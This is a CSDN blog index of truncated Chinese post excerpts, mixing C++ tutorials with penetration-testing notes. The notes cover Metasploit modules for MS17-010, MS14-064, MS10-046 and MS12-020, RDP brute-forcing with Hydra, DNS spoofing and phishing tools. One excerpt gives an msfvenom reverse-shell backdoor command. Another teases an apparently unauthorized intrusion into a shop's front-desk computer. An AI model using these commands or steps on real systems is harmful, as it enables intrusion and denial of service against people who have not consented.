aozhuo4755-CSDN博客

转载 MSF里MS17_010利用模块笔记

1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块扫描结果这里可以看到 2,3,4这几台主机存在此漏洞！2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务3. exploit/...

2019-04-14 19:38:00 416

转载 php表单笔记

PHP获取表单值：$_POST //获取POST提交$_GET // 获取GET提交<!DOCTYPE html><html><head> <title>php表单</title></head><body> <h1>PHP表...

2019-04-12 11:24:00 235

转载对本地某电脑专卖店前台主机的一次渗透入侵

时间过的真快，转眼就快到18年底了，然而还是没有挣到多少钱。心塞，欠了一屁股债，伤不起。最近在帮某公司做售后服务，刚没去多久，还不是很熟悉店里的情况。貌似前台小妹妹脾气不怎么好，这不让碰那不让碰的，谁叫她是老板的妹呢~哈...好多客户来修机器都被她弄跑了呀。厉害厉害...于是便有了此文...先fping扫了下网段下的在线主机，10.0.0.58这台主机是我本机的IP地址。...

2018-12-15 13:37:00 201

转载 Kali Linux (XFce版本)安装后的一些设置

kali Linux的主版本自带的是Gnome桌面环境，安装后使用效率太低，不知道是不是我机器配置低的原因，在虚拟机里运行起来太慢、卡、丑啦...。所以以前都一直都在用Backbox Linux，并且backbox linux 默认的桌面环境是XFce，所以渐渐的喜欢上了XFce，昨天无聊去官网看了下，发现好久没用kali，发布了很多的版本，然后下载了自己喜欢的桌面环境(...

2016-09-03 17:30:00 973

转载用MSF进行提权

在WEB渗透中当我们拿到webshell了，我们可以试试用MSF(metasploit)来进行提权，在MSF里meterpreter很强大的！我们先用msfvenom生成一个EXE的木马后门。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.16...

2016-08-14 15:18:00 1473

转载 C/C++ 一些常用的运算符

算数运算符语法解释说明举例a + b加法（求和）1+1..2+2.. 2.5+2.5..等等a - b减法（求差）5 - 2..a * b乘法（求积）2 * 5a / b除法（分子）10 / 5a % b模数（余数）9 % 2a++后自加先参与运算，再自增...

2016-08-09 11:40:00 146

转载对某钓鱼网站的一次失败渗透分析

无聊正玩着手机QQ空间，发现来了一条消息，就打开看了下。看见有人@了我一下标题挺吸引人的，呵呵...有点常识经验的一看就知道不是什么好事的，然后点开看了下可以发现此号@了很多和这个号有联系的QQ好友，估计我这位朋友的号被盗用了，才会发这些带有钓鱼网站的说说。如果是无经验的，没有任何安全常识的朋友，还以为是真的，后果想必大家都知道。。...

2016-05-28 13:06:00 162

转载 MS15-020漏洞测试

名称：Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020)了解：Microsoft Windows没有正确处理DLL文件的加载，存在远程代码执行漏洞，通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞，成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式，可以使用.CPL文件来自定义图标。问...

2016-04-26 17:27:00 518

转载 MS14-064 漏洞测试入侵win7

Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术，远程攻击者利用此漏洞通过构造的网站执行任意代码，影响Win95+IE3 – Win10+IE11全版本...metasploit里已经加入了此漏洞的利用模块：exploit/windows/browser/ms14_064_ole_code_executi...

2016-04-25 16:30:00 1887

转载初试钓鱼工具Weeman+DNS欺骗的使用

下午无聊再网上闲逛随意看了下，自己做了一次测试，目前最新的版本是1.6。Weeman是一款运行在Python环境下的钓鱼渗透测试工具但这款工具简单易用，安装简单，可伪造HTML页面等等。。。网上看了下，国内这个工具教程很少，要么教程都是重复的，而且也不是很详细。所以自己摸索了几个小时，把大致的使用过程发布出来和大家分享一下。说的不好地方请大家见谅。工具项目地址：https:/...

2016-02-12 21:59:00 235

转载初试在线破解工具Hydra爆破3389服务器

hydra是一款全能的暴力破解工具，功能强大，几乎支持所有的协议，是著名黑客组织thc开发的。在Kali Linux下已经是默认安装的，于是测试爆破一下自己的一台VM虚拟机服务器。hydra还支持GUI图形界面(xhydra)，不过习惯还是命令好用。(爆破3389端口终端登录的帐号和密码协议：rdp)帮助命令：hydra -h //查看基本用法参数说明：hy...

2016-01-29 15:11:00 132

转载原创QQ影音DLL劫持漏洞+动画实战教程

1.什么是DLLDLL(Dynamic Link Library)文件为动态链接库文件，又称“应用程序拓展”，是软件文件类型。在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。当我们执行某一个程序时，相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件，一个DLL文件也可能被不同的应用程序使用，这样的...

2016-01-24 16:51:00 248

转载一次简单的分析手机APK病毒木马

写个笔记记录一下，起因是朋友在QQ上发了个连接叫我看看安不安全，叫我帮他看看，反正在店里待着也没生意，那就顺便看看咯。打开这个网址会自动弹出下载一个名为OOXX的APK安装包。起先我的思路是想先从这个网站下手！先搞定这个网站或者服务器吧，然后我就去网站主页看了下。是一个网址缩短(变形)的网站。那么我们给地址还原成真实地址，http://1...

2016-01-07 16:43:00 1619

转载编写简单的C/S聊天程序

找了点资料看了下，于是自己动手做了一个练习一下，主要用到TServerSocket和TClientSocket这个控件。客户端:var Form1: TForm1; NewTime:string;implementation{$R *.dfm}procedure TForm1.Button1Click(Sender: TObject);...

2015-12-15 21:11:00 360

转载 ettercap局域网内DNS欺骗(隔壁的哥们轻一点 ...)

笔记一：ettercap是什么？我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具，功能相信用过的朋友多多少少都知道，但这两款工具是在windows下运行的。而ettercap是在linux下运行的。其实功能都是差不多的，我称呼它为嗅探工具，ARP欺骗，DNS，劫持，中间人攻击等等。总之这是一款强大的安全测试工具。笔记二：DNS简单说明了解DNS是什...

2015-12-13 16:49:00 1858

转载 C++引用笔记

1.什么是引用：百度百科里的解释：引用就是某一变量（目标）的一个别名，对引用的操作与对变量直接操作完全一样。用&符号表示举例： 1 using namespace std; 2 int _tmain(int argc, _TCHAR* argv[]) 3 { 4 int love = 520; 5 int &ai=love;...

2015-12-08 12:01:00 80

转载 C++指针笔记

什么是指针：指针是一个特殊的变量，它里面存储的数值被解释成为内存里的一个地址。通过指针我们可以直接对内存进行操作。什么是地址：比如你要给你朋友寄快递，在寄东西的时候是不是要填写地址，通过地址你的东西才能送到朋友手里。同理，比如你定义一个变量为i。而这个变量i是存在计算机内存中的，也就是i在这个内存中的编号，即地址。举例：#include <iostrea...

2015-12-03 17:33:00 79

转载破解入门【OllyDebug爆破程序】

逆向破解这块我也是个刚起步的小菜，入门都还算不上吧，看了点基础教程，先动手练习一下增加点兴趣。嘿嘿工具：peid //查壳工具OllyDebug //反汇编、动态调试工具简称OD壳的概念：作者编好软件后,编译成exe可执行文件。 1.有一些版权信息需要保护起来,不想让别人随便改动,如作者的姓名等，即为了保护软件不被破解，通常...

2015-12-02 15:00:00 197

转载 c++类的定义《一》

最近好忙，一来要在店里看店，二来朋友办结婚酒，搞的我这几天好疲惫啊···博客又有好几天没提笔了。下午简单看了下书，看到了类的部分，自己动手练习了一下笔记：1.类是数据类型 / 它的变童就是对象格式：class 类名 { public: //公有的...成员 private: ...

2015-11-24 16:40:00 119

转载数组

百度百科：所谓数组，就是相同数据类型的元素按一定顺序排列的集合，就是把有限个类型相同的变量用一个名字命名，然后用编号区分他们的变量的集合，这个名字称为数组名，编号称为下标。组成数组的各个变量称为数组的分量，也称为数组的元素，有时也称为下标变量。数组是在程序设计中，为了处理方便，把具有相同类型的若干变量按有序的形式组织起来的一种形式。这些按序排列的同类数据元素的集合称为数组。...

2015-11-15 10:38:00 95

转载 while循环语句的使用

说明：先判断表达式，后执行语句，while循环称为当型循环。如果指定的条件为真(表达式为非0)时，执行while语句中的内嵌语句。格式：while (表达式) //判断括号内表达式真（true）　　｛ ···循环内执行的语句　　｝举例：求1+2+3+4+5+6…+100 连续相加的和。代码：#include...

2015-11-10 10:29:00 493

转载 MS10-046漏洞测试

这次用到MS10-046这个远程执行漏洞（Windows快捷方式LNK文件自动执行代码漏洞攻击）命令:1. msfconsole //启动MSFMetasploit2. search ms10-046 //搜索漏洞3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模...

2015-11-09 17:05:00 722

转载 For循环语句的使用

一、For循环语句说明：For循环用于循环次数已经确定的情况下。格式：for(循环变量赋初值; 循环条件; 循环变量增值) ｛ ·····语句　　　｝举例：求1到100相加的和代码：#include <vcl.h>#include <iostream>#pragma hdrstop...

2015-11-09 11:41:00 162

转载 C++Builder编写计算器

用C++Builder确实能快速上手，只要是会一点C++基础的，都能很快的编写一些小程序，而且VCL库组件也很丰富，比微软MFC强多了。自己动手写了一个计算器来增加自己的兴趣。C++基础以后有空还是还得学着走。。。代码：//---------------------------------------------------------------------...

2015-11-06 11:51:00 1275

转载 C++自定义函数

函数可以看成是用户为了解决某特定问题而定义的操作。除了在C++语法里自带的函数，有时候我们需要处理某个问题。但C++里并没有这个函数，这时我们就可以自己来定义一个函数实现需要的功能。比如我们定义个求两数的和的函数，代码如下： 1 #include <iostream.h> 2 using namespace std; 3 int sum (int Num1...

2015-10-15 17:41:00 302

转载 MS12-020蓝屏攻击

MS12-020远程桌面协议RDP拒绝访问漏洞条件：受害者必须开放RDP协议开放了3389端口或者端口改了，知道对方RDP开放的对应端口。过程：MSF利用MSF显示为seems down说明目标已经被攻击。如图已经蓝屏。转载于:https://www.cnblogs.com/hkleak/p/4853568.html...

2015-10-03 16:50:00 207

转载编写简单的计算器

源码如下： 1 #include <iostream> 2 #include <String> 3 using namespace std; 4 5 int main(int argc, char *argv[]) 6 { 7 int a,b; //取输入值变量 8 int sum;//求答案变量 ...

2015-10-03 14:19:00 111

转载我的第一个C++程序

准备抽空学习C++了，不知道自己以后能不能坚持下去，去百度查了一下入门，大多数朋友都是选择用VC++或者VS，而我这里用的是C-Free 5 ，安装包也只有十几兆。用起来也方便。对于初学者而言够用了。至于去哪里下载和安装方法这里就不说了。1.首先打C-Free 5 点击新建工程2.在选择控制台程序工程的名称和保存的位置点击确定3.选择一个简单的程序然后点击...

2015-10-01 11:40:00 92

转载开通博客，关于博主。

博客开通啦，以后这里就是我的一个小笔记本了，希望能帮助自己的同时也能帮助其他的朋友。博主在现实里并不是从事IT这个行业的，其实我是一个搬砖的，哈···文化也就初中而已。至于为什么开这个博客，首先肯定的一点就是自己喜欢。还有就是为了写点笔记，我的记忆力很差的 - -、谈不上大神，也谈不上专业什么的。。。反正，业余上网学点东西总好嘛，生活也更变得丰富多彩了。哈··· ...

2015-06-25 13:15:00 70

aozhuo4755的博客